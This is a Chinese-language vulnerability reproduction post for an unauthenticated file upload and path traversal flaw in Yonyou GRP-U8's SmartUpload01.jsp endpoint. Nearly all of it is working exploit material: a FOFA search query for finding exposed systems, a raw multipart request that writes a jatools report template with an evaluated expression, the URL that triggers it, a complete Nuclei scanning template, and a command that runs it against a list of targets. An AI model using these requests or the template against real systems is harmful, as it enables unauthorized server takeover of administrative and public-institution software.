【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞（附POC）

app="用友-GRP-U8"

POST /u8qx/SmartUpload01.jsp HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqtUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
------WebKitFormBoundaryzhvrkrqtContent-Disposition: form-data; name="uname"
../../../../../../../../../fljnyucrkvzycmtwbfiw------WebKitFormBoundaryzhvrkrqtContent-Disposition: form-data; name="input_localfile"; filename="fljnyucrkvzycmtwbfiw.pdf"
<jatools Class="jatools.ReportDocument" Name="jatools report template"><VariableContext></VariableContext><Page><Name>panel</Name><Children ItemClass="PagePanel"><Item0><Name>header</Name><Width>753</Width><Height>80</Height><Children ItemClass="Label"><Item0><Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text><ForeColor>-65536</ForeColor><X>41</X><Y>15</Y><Width>362</Width><Height>62</Height></Item0></Children><Type>100</Type></Item0><Item1><Name>footer</Name><Y>802</Y><Width>753</Width><Height>280</Height><Type>103</Type></Item1><Item2><Name>body</Name><Y>80</Y><Width>753</Width><Height>722</Height><Children ItemClass="Table"><Item0><NodePath>学生表</NodePath><X>115</X><Y>77</Y><Children><Item0 Class="Label"><Text>家庭成员</Text><Border/><PrintStyle>united-level:1;</PrintStyle><Cell><Row>3</Row><Col>0</Col><RowSpan>2</RowSpan></Cell></Item0><Item1 Class="Label"><Text>关系</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>1</Col></Cell></Item1><Item2 Class="Label"><Text>性别</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>2</Col></Cell></Item2><Item3 Class="Label"><Text>年龄</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>3</Col></Cell></Item3><Item4 Class="Label"><Text>得分</Text><Border/><Cell><Row>2</Row><Col>0</Col></Cell></Item4><Item5 Class="Label"><Text>性别</Text><Border/><Cell><Row>1</Row><Col>0</Col></Cell></Item5><Item6 Class="Label"><Text>姓名</Text><Border/><Cell><Row>0</Row><Col>0</Col></Cell></Item6><Item7 Class="Text"><Variable>=$学生表</Variable><Border/><Cell><Row>0</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item7><Item8 Class="Text"><Variable>=$学生表.value()</Variable><Border/><Cell><Row>1</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item8><Item9 Class="Text"><Variable>=$学生表.getName()</Variable><Border/><Cell><Row>2</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item9><Item10 Class="RowPanel"><Cell><Row>4</Row><Col>0</Col><ColSpan>4</ColSpan></Cell><Children ItemClass="Text"><Item0> <Variable></Variable><Border/><Cell><Row>4</Row><Col>3</Col></Cell></Item0><Item1><Variable></Variable><Border/><Cell><Row>4</Row><Col>2</Col></Cell></Item1><Item2><Variable>;</Variable><Border/><Cell><Row>4</Row><Col>1</Col></Cell></Item2></Children><NodePath>成员</NodePath></Item10></Children><ColumnWidths>60,60,60,60</ColumnWidths><RowHeights>20,20,20,20,20</RowHeights></Item0></Children><Type>102</Type></Item2></Children></Page><NodeSource><Children ItemClass="ArrayNodeSource"><Item0><Children ItemClass="ArrayNodeSource"><Item0><TagName>成员</TagName><Expression>$.value()</Expression></Item0></Children><TagName>学生表</TagName><Expression>new Object[]{123*123}</Expression></Item0></Children></NodeSource></jatools>------WebKitFormBoundaryzhvrkrqt--

HTTP/1.1 200 OKDate: Mon, 25 Dec 2023 02:08:40 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=F5ABE2177546F4; Path=/; HttpOnlyContent-Type: text/html;charset=gbkContent-Length: 311


<html>  <head>    <title>SmartUpload</title>  </head>  <body>         <font color="red">图片名：../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf</font><br>   <h2><img src="nullu8qxupload../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf" width="200" height="300"></h2>  </body></html>

http://x.x.x.x/jatoolsreport?file=/fljnyucrkvzycmtwbfiw.pdf&as=dhtml

id: yonyou-grp-u8-smartupload01-fileupload
info:  name: 用友 GRP u8 SmartUpload01 文件上传漏洞  author: fgz  severity: critical  description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统，旨在提高内部控制的效率和准确性。该软件/u8qx/SmartUpload01.jsp接口存在文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。  metadata:    max-request: 1    fofa-query: app="用友-GRP-U8"    verified: truevariables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  rboundary: "{{to_lower(rand_text_alpha(8))}}"requests:  - raw:      - |+        POST /u8qx/SmartUpload01.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}        Accept-Encoding: gzip
        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="uname"                ../../../../../../../../../{{file_name}}        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="input_localfile"; filename="{{file_name}}.pdf"                <jatools Class="jatools.ReportDocument" Name="jatools report template">        <VariableContext>        </VariableContext>        <Page>        <Name>panel</Name>        <Children ItemClass="PagePanel">        <Item0>        <Name>header</Name>        <Width>753</Width>        <Height>80</Height>        <Children ItemClass="Label">        <Item0>        <Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text>        <ForeColor>-65536</ForeColor>        <X>41</X>        <Y>15</Y>        <Width>362</Width>        <Height>62</Height>        </Item0>        </Children>        <Type>100</Type>        </Item0>        <Item1>        <Name>footer</Name>        <Y>802</Y>        <Width>753</Width>        <Height>280</Height>        <Type>103</Type>        </Item1>        <Item2>        <Name>body</Name>        <Y>80</Y>        <Width>753</Width>        <Height>722</Height>        <Children ItemClass="Table">        <Item0>        <NodePath>学生表</NodePath>        <X>115</X>        <Y>77</Y>        <Children>        <Item0 Class="Label">        <Text>家庭成员</Text>        <Border/>        <PrintStyle>united-level:1;</PrintStyle>        <Cell>        <Row>3</Row>        <Col>0</Col>        <RowSpan>2</RowSpan>        </Cell>        </Item0>        <Item1 Class="Label">        <Text>关系</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>1</Col>        </Cell>        </Item1>        <Item2 Class="Label">        <Text>性别</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>2</Col>        </Cell>        </Item2>        <Item3 Class="Label">        <Text>年龄</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>3</Col>        </Cell>        </Item3>        <Item4 Class="Label">        <Text>得分</Text>        <Border/>        <Cell>        <Row>2</Row>        <Col>0</Col>        </Cell>        </Item4>        <Item5 Class="Label">        <Text>性别</Text>        <Border/>        <Cell>        <Row>1</Row>        <Col>0</Col>        </Cell>        </Item5>        <Item6 Class="Label">        <Text>姓名</Text>        <Border/>        <Cell>        <Row>0</Row>        <Col>0</Col>        </Cell>        </Item6>        <Item7 Class="Text">        <Variable>=$学生表</Variable>        <Border/>        <Cell>        <Row>0</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item7>        <Item8 Class="Text">        <Variable>=$学生表.value()</Variable>        <Border/>        <Cell>        <Row>1</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item8>        <Item9 Class="Text">        <Variable>=$学生表.getName()</Variable>        <Border/>        <Cell>        <Row>2</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item9>        <Item10 Class="RowPanel">        <Cell>        <Row>4</Row>        <Col>0</Col>        <ColSpan>4</ColSpan>        </Cell>        <Children ItemClass="Text">        <Item0> <Variable></Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>3</Col>        </Cell>        </Item0>        <Item1>        <Variable></Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>2</Col>        </Cell>        </Item1>        <Item2>        <Variable>;</Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>1</Col>        </Cell>        </Item2>        </Children>        <NodePath>成员</NodePath>        </Item10>        </Children>        <ColumnWidths>60,60,60,60</ColumnWidths>        <RowHeights>20,20,20,20,20</RowHeights>        </Item0>        </Children>        <Type>102</Type>        </Item2>        </Children>        </Page>        <NodeSource>        <Children ItemClass="ArrayNodeSource">        <Item0>        <Children ItemClass="ArrayNodeSource">        <Item0>        <TagName>成员</TagName>        <Expression>$.value()</Expression>        </Item0>        </Children>        <TagName>学生表</TagName>        <Expression>new Object[]{123*123}</Expression>        </Item0>        </Children>        </NodeSource>        </jatools>        ------WebKitFormBoundary{{rboundary}}--
      - |        GET /jatoolsreport?file=/{{file_name}}.pdf&as=dhtml HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip
    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '15129') && contains(body_2, '<p class=')"

nuclei.exe -t yonyou-grp-u8-smartupload01-fileupload.yaml -l 用友-GRP-U8.txt